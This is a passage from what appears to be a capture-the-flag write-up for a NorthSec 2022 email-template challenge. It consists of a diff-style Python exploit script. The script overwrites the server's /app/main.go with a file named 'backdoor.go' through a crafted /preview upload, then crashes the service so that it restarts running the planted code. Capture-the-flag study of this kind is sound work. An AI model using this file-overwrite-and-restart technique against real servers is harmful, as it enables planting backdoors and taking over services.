ja-p/ja-p.github.io/content/posts/nsec2022-email-template/index.md

 # Filename: /app/main.go
 files = {'fish': ("/app/main.go", open("backdoor.go","r"))}

+# Updates the preview template.
 r = requests.post(URL+"/update", json=payload)
 print(r.status_code)
 print(r.text)

+# Defines all the required custom variables and triggers the rendering of our template with the provided form file
 r = requests.post(URL+"/preview?custom1=a&custom2=a&custom3=a&custom4=a&custom5=a&custom6=a&custom7=a&custom8=a&custom9=a&custom%3A=a&custom%3B=a&custom%3C=a&custom%3D=a&custom%3E=a&custom%3F=a&custom%40=a&customA=fish", files=files)
+print(r.status_code)
+print(r.text)

+# Crashes server, which restarts the service.
+r = requests.post(URL+"/update")
 print(r.status_code)
 print(r.text)
 ```